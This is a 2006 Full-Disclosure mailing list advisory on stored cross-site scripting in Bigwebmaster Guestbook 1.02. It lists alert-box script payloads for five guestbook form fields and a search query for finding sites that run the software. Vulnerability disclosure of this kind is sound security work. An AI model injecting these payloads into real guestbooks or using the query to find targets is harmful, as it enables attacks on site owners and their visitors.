[Full-disclosure] bigwebmaster guestbook multiply XSS
drfrancky at securax.org
Thu May 4 17:02:11 BST 2006
Bigwebmaster Guestbook version 1.02 and down
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.
mail: xss at example.com <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>
intitle:Big Webmaster Guestbook
I DON'T CARE
Javor Ninov aka DrFrancky
-------------- next part --------------
A non-text attachment was scrubbed...
Size: 189 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060504/2f223d97/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.